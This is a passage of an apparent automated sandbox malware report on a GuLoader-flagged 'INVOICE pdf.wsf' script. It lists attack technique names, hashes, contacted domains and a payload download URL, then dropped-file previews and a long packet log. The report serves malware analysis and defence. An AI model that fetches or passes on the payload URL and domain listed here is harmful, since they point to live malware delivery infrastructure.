          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
          Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
          [Behavior Graph: ID 1428858, Sample: INVOICE pdf.wsf, Startdate: 19/04/2024, Architecture: WINDOWS, Score: 100]

          Source | Detection | Scanner | Label | Link
          INVOICE pdf.wsf | 16% | ReversingLabs | Script-JS.Trojan.Guloader |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
          http://crl.microsoft | 0% | URL Reputation | safe |
          https://go.micro | 0% | URL Reputation | safe |
          https://contoso.com/ | 0% | URL Reputation | safe |
          https://contoso.com/License | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          http://www.microsoft. | 0% | URL Reputation | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          originalconceptsinc.ru.com | 216.10.249.248 | true | false | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfb | false | | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nuget.org/NuGet.exe | powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXR | powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
          http://originalconceptsinc.ru.com | powershell.exe, 00000007.00000002.4087877267.000002448B88B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448A404000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448BD8D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
          https://aka.ms/pscore6lB | powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://crl.microsoft | powershell.exe, 0000000A.00000002.4109661918.0000000007669000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://go.micro | powershell.exe, 00000007.00000002.4087877267.000002448B1AA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://contoso.com/ | powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://contoso.com/License | powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://contoso.com/Icon | powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbP | powershell.exe, 00000007.00000002.4087877267.000002448A1F7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
          http://www.microsoft. | powershell.exe, 0000000A.00000002.4109661918.000000000771E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://aka.ms/pscore68 | powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                  216.10.249.248 | originalconceptsinc.ru.com | India | | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
                                  IP
                                  127.0.0.1
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1428858
                                  Start date and time:2024-04-19 18:15:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 8m 42s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:INVOICE pdf.wsf
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winWSF@19/6@1/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 48
                                  • Number of non-executed functions: 16
                                  Cookbook Comments:
                                  • Found application associated with file extension: .wsf
                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 7732 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7984 because it is empty
                                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: INVOICE pdf.wsf
                                  Time | Type | Description
                                  18:15:56 | API Interceptor | 111x Sleep call for process: powershell.exe modified
                                  No context
                                  No context
                                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                  PUBLIC-DOMAIN-REGISTRYUS | HmGUCvTQIacWu7Q.exe | malicious | AgentTesla | 208.91.199.224
                                  | Payment.exe | malicious | AgentTesla, PureLog Stealer, RedLine | 208.91.199.224
                                  | Gcerti Quote.exe | malicious | AgentTesla | 208.91.199.224
                                  | Syknivkloo.exe | malicious | AgentTesla | 208.91.199.224
                                  | F723838674.vbs | malicious | Remcos | 116.206.104.215
                                  | CTM REQUEST BIRTHSHIP.doc | malicious | AgentTesla | 208.91.199.224
                                  | PURCHASE ORDER -HDPESD.exe | malicious | AgentTesla | 208.91.199.224
                                  | order 4500381478001.exe | malicious | AgentTesla | 162.215.248.214
                                  | Bill-Transcript_6ZB6-IJYD3B-SEH0.html | malicious | Unknown | 45.113.122.212
                                  | rks18.doc | malicious | AgentTesla | 208.91.199.224
                                  No context
                                  No context
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):11608
                                  Entropy (8bit):4.886255615007755
                                  Encrypted:false
                                  SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                  MD5:C7F7A26360E678A83AFAB85054B538EA
                                  SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                  SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                  SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):435220
                                  Entropy (8bit):5.972804516426518
                                  Encrypted:false
                                  SSDEEP:6144:QroTcEuFOIUHsDTpcrtNV6i9v7GZS2lAg7NlKWbi7Fz1tMrXqZyxBO9da9QJnGUI:QrowafwAb2lAg7THmR7GXuW9Q3I
                                  MD5:65A4520546D82D6E7540070D1D37C6F2
                                  SHA1:0127DE240377CC528273091A7F80D70B8FA53049
                                  SHA-256:7C491432504B8FAD24A4CCAD141EFC791C56C8DE3D1C3175E7B2923FD21B9971
                                  SHA-512:E40962871AE3970F0639FBAA07191A2D51C8686A2018C819DCEA4CE1D163865604A4F3FE78726B8CAC4E14C0843316DC27C0AF6726A0A00175381A2ACAC4EFE4
                                  Malicious:false
                                  File type:XML 1.0 document, ASCII text, with very long lines (1969), with CRLF line terminators
                                  Entropy (8bit):5.133093479073143
                                  TrID:
                                  • Generic XML (ASCII) (5005/1) 50.01%
                                  • Synchronized Multimedia Integration Language (5002/2) 49.99%
                                  File name:INVOICE pdf.wsf
                                  File size:230'709 bytes
                                  MD5:62a9fb211e083aefa46e2a82cbef11bc
                                  SHA1:f1e75cf66bbaf1ea3535bfe188f11d08dac775c8
                                  SHA256:7bf66677d4f93167a77e217bcf72899ffdbcd62cb79688fa7e7346ac91a14678
                                  SHA512:65295e73290a6357ef4dbaf2d882880101ae97fe2a6b1d7835437e9b0a3339eeb70fc6a762b58b22e9d5a9699419a2816f9d2319a2e692900dcc69687794a86a
                                  SSDEEP:6144:rWEeg2kae621pGqbWt0JPvk+r+usYBbnPZnqtFVyNLFViFHV/O3CLfItE0Pux:nWqv6uVKUux
                                  TLSH:AB3419E0CFCA26399F4B3ED9AD64444289F88195011228BDE6D907EDB243D6CD3FED58
                                  File Content Preview:<?xml version="1.0" ?>..<job id="@JOB_ID@">..<script ..language="VBScript">..' <![CDATA[....Rem sjoverens sowel?..Rem baarings udarbejdedes,..Rem Perikumbrndevin nyttiggrelserne aggravation: multivalency..Rem Homeriskes? occipitoaxial: amoebicidal150..
                                  Icon Hash:68d69b8f86ab9a86
                                  Document Type:Text
                                  Number of OLE Files:1
                                  Has Summary Info:
                                  Application Name:
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:False
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:False
                                  Flash Objects Count:0
                                  Contains VBA Macros:True
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Apr 19, 2024 18:16:00.866421938 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866434097 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866471052 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866508007 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866537094 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866544962 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866564035 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866585016 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866621971 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866636038 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866660118 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866695881 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866707087 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866734028 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866770983 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866781950 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866807938 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866846085 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866859913 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866884947 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866921902 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866933107 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.866960049 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.866996050 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867023945 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867033005 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867074013 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867080927 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867111921 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867149115 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867157936 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867187023 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867225885 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867232084 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867264032 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867300987 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867305994 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867361069 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867402077 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867407084 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867439985 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867477894 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867486954 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867516994 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867553949 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867562056 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867592096 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867630005 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867634058 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867670059 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867707968 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867714882 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867746115 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867784023 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867789984 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867821932 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867860079 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867866039 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867898941 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867935896 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.867948055 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.867973089 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868010044 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868021011 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868047953 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868084908 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868093014 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868141890 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868179083 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868185997 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868216991 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868254900 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868262053 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868292093 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868328094 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868334055 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868366957 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868405104 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868411064 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868443966 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868480921 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868486881 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868524075 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868561029 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868571997 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868597984 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868634939 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868637085 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868673086 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868710041 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868721008 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868747950 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868786097 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868798971 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868824005 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868860006 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868870020 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868897915 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868935108 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.868941069 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.868972063 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869008064 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869015932 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869045973 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869082928 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869091988 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869121075 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869158030 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869164944 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869195938 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869230986 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869239092 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869270086 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869307041 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869312048 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869347095 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869383097 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869385958 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869422913 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869461060 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869466066 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869499922 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869537115 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869544029 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869575024 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869611979 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869618893 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869656086 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869693041 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869699001 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869729996 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869767904 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869776011 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869806051 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869843006 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869844913 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869882107 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869919062 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869926929 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.869956970 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869995117 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.869997025 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:00.870034933 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:00.870080948 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379511118 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379578114 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379618883 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379631996 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379657984 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379697084 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379709005 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379733086 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379738092 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379770041 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379780054 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379791975 CEST4973080192.168.2.4216.10.249.248
                                  Apr 19, 2024 18:16:01.379821062 CEST8049730216.10.249.248192.168.2.4
                                  Apr 19, 2024 18:16:01.379841089 CEST4973080192.168.2.4216.10.249.248
